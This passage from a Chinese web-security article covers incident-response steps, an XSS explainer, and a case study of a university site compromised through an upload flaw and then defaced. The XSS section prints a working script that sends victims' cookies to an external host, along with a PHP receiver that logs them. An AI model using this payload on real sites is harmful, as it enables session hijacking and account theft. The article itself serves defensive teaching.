網(wǎng)絡(luò)層及web應(yīng)用層的安全技術(shù)研究(四)

2、惡意攻擊事故緊急處置措施

(1)發(fā)現(xiàn)出現(xiàn)網(wǎng)絡(luò)惡意攻擊，立刻確定攻擊源在哪里，判斷是否需要緊急切斷 Web 服務(wù)器的網(wǎng)絡(luò)連接，以保護(hù)重要數(shù)據(jù)及信息。

(2)查出對方 IP 地址并過濾，同時對防火墻設(shè)置對此類攻擊的過濾，并視情況嚴(yán)重程度決定是否報警。

(3)當(dāng)有網(wǎng)頁內(nèi)容被篡改，或通過入侵檢測系統(tǒng)發(fā)現(xiàn)有黑客正在進(jìn)行攻擊時,首先應(yīng)將被攻擊的服務(wù)器等設(shè)備從網(wǎng)絡(luò)中隔離出來，技術(shù)人員立即進(jìn)行被破壞系統(tǒng)的恢復(fù)與重建工作。

3、病毒安全緊急處置措施

當(dāng)發(fā)現(xiàn)計算機(jī)感染有病毒后，應(yīng)立即將該機(jī)從網(wǎng)絡(luò)上隔離出來。對該設(shè)備的硬盤進(jìn)行數(shù)據(jù)備份。啟用反病毒軟件對該機(jī)進(jìn)行殺毒處理，同時使用病毒檢測軟件對其他機(jī)器進(jìn)行病毒掃描和清除工作。

4、應(yīng)用系統(tǒng)和數(shù)據(jù)庫遭受破壞性攻擊的緊急處置措施

重要的軟件系統(tǒng)平時必須存有備份，與軟件系統(tǒng)相對應(yīng)的數(shù)據(jù)必須有多日備份，并將它們保存于安全處。一旦軟件遭到破壞性攻擊，應(yīng)立即向技術(shù)人員、網(wǎng)絡(luò)管理員報告，并將系統(tǒng)停止運(yùn)行。網(wǎng)站維護(hù)員立即進(jìn)行軟件系統(tǒng)和數(shù)據(jù)的恢復(fù)。

4.2安全事故發(fā)生后有關(guān)行動

1、確保 WEB 應(yīng)用信息安全為首要任務(wù)。迅速發(fā)出緊急警報，所有相關(guān)安全成員集中進(jìn)行事故分析，確定處理方案。

2、確保其它接入設(shè)備的信息安全：經(jīng)過分析，可以迅速關(guān)閉、切斷其他接入設(shè)備的所有網(wǎng)絡(luò)連接，防止滋生其他接入設(shè)備的安全事故。

3、分析網(wǎng)絡(luò)，確定事故源：使用各種網(wǎng)絡(luò)管理工具，迅速確定事故源，按相關(guān)程序進(jìn)行處理。

4、事故源處理完成后，逐步恢復(fù)網(wǎng)絡(luò)運(yùn)行，監(jiān)控事故源是否仍然存在。

5、針對此次事故，進(jìn)一步確定相關(guān)安全措施、總結(jié)經(jīng)驗(yàn)，加強(qiáng)防范。

6、從事故一發(fā)生到處理的整個過程，必須及時向安全領(lǐng)導(dǎo)小組匯報，聽從安排，注意做好保密工作。

  4.4 什么是XSS攻擊

   XSS其實(shí)就是跨站腳本攻擊的英文縮寫，攻擊者利用WEB平臺的漏洞，將惡意的客戶端腳本代碼(如 java script )通過各種“巧妙”的方式植入正常的網(wǎng)頁中，當(dāng)受害者訪問此惡意頁面后，就會執(zhí)行相應(yīng)的惡意代碼，從而達(dá)到攻擊者的某種目的，比如盜取瀏覽器會話、cookie信息等等。

4.5 XSS漏洞如何利用

   說到xss攻擊，其實(shí)菲菲博客個人感覺利用最多的就是來盜取用戶帳號，包括QQ賬戶、網(wǎng)銀支付號等等（比如劫持受害者的QQ cookie繞過驗(yàn)證）；在就是可以用來網(wǎng)頁掛馬，甚至在受害者電腦留下后門程序；還有更嚴(yán)重的是駭客可以編寫復(fù)雜的腳本用來做非法DDos網(wǎng)絡(luò)攻擊等等。可見xss攻擊的危害還是非常大的！

　　如果來舉個簡單的例子，或許大家就可以更容易理解了。假設(shè)在某個知名網(wǎng)站存在漏洞的頁面中成功嵌入了如下js腳本（實(shí)際應(yīng)用中可以嵌入外部js文件,這里僅做演示，實(shí)際不存在）：

<script>document.write("<img src='http://www.feifeiboke.com/xss.php?c=" + escape(document.cookie) + "' />");</script>

其中xss.php也就是cookie接收端，我們可以寫為：

<?php 

$co = $_GET['c']; 

$fo = fopen('1.html', 'a'); 

fwrite($fo, 'Cookie: ' . $co . '<br>'); 

fclose($fo); 

?>

這樣當(dāng)受害者訪問并成功執(zhí)行了我們構(gòu)造的惡意腳本后，對方的cookie信息就會自動保存在1.html中。獲得了對方的cookie，也就相當(dāng)于拿到了他的賬戶管理權(quán)限。

4.6 XSS跨站漏洞的防范和應(yīng)對

其實(shí)xss漏洞的危害遠(yuǎn)比我們想象中的要嚴(yán)重的多，包括很多知名站點(diǎn)騰訊、百度、新浪微博等等都曾爆出過xss漏洞，應(yīng)該說是防不勝防啊。當(dāng)然及時修復(fù)web漏洞/避免出現(xiàn)漏洞是這些網(wǎng)站安全工程師做的事兒，那么從我們用戶的角度來說的話如何防范xss漏洞對自己造成的影響呢？

　　1. 不要訪問別人發(fā)來的可疑網(wǎng)址鏈接，例如某些網(wǎng)址后面有一大串編碼的參數(shù)（很可能是壞人精心構(gòu)造含有惡意腳本的頁面），還有就是短網(wǎng)址，你是直接看不出對方的真實(shí)網(wǎng)站鏈接的，所以訪問一定要謹(jǐn)慎！

　　2. 使用最新版本的瀏覽器，比如IE8內(nèi)核的瀏覽器，就自帶有XSS篩選器的功能（默認(rèn)就是啟用狀態(tài)），這雖不能完全解決xss的危害，但是對于防范一些xss跨站腳本還是有一定的效果的。

　　3. 提高安全意識，一些重要的帳號使用完畢后（比如網(wǎng)銀/支付賬戶）要點(diǎn)擊“退出”登錄狀態(tài)，而不是直接關(guān)閉網(wǎng)頁

4.7 案例分析

1. 過程分析：

通過對服務(wù)器web日志進(jìn)行分析，發(fā)現(xiàn)攻擊者ip為：112.203.220.26、112.204.103.37，兩ip均來自菲律賓，通過得兩ip的行為分析，發(fā)現(xiàn)，其首先對學(xué)院審計學(xué)網(wǎng)站進(jìn)行了目錄掃描，如圖：

                                 圖4

通過掃描，惡意用戶發(fā)現(xiàn)網(wǎng)站后臺登錄地址，通過日志分析，惡意用戶直接登錄后臺，為做其他登錄嘗試，猜測網(wǎng)站后臺采用默認(rèn)口令，或通過其他途徑獲取到管理員密碼，如圖：

                                 圖5

登錄后臺成功后，惡意用戶遍歷后臺功能，發(fā)現(xiàn)后臺某上傳文件處存在上傳漏洞，惡意用戶通過此上傳漏洞上傳惡意文件，如圖：

                                 圖6

因?yàn)榇颂幧蟼鳛檎�常業(yè)務(wù)，且程序端存在校驗(yàn)不足，而WAF設(shè)備無法判斷業(yè)務(wù)邏輯上存在的漏洞，故而被入侵。

惡意用戶入侵審計學(xué)網(wǎng)站后，通過ip反查域名，發(fā)現(xiàn)學(xué)院主站也掛在此服務(wù)器上，如圖：

                                圖7

惡意用戶通過已經(jīng)上傳的木馬，可跨目錄修改主站的文件，通過日志可以看到其涂改主頁的記錄：

                               圖8

修補(bǔ)方案

1.修改網(wǎng)站后臺登錄密碼。

2.網(wǎng)站后臺地址做個性化處理，不要使用admin、manger、system等常用后臺地址。

3.在apache設(shè)置中取消上傳文件所在目錄的文件執(zhí)行權(quán)限。

4.修補(bǔ)web程序代碼，上傳做白名單校驗(yàn)，且上傳后文件必須經(jīng)重命名處理。

5.Apache多站點(diǎn)分用戶權(quán)限設(shè)置，防止一個網(wǎng)站被入侵后，修改其他網(wǎng)站目錄的文件。

2.過程分析：

1.通過對google搜索發(fā)現(xiàn)網(wǎng)站在2.15號前已被掛暗鏈：

                         圖9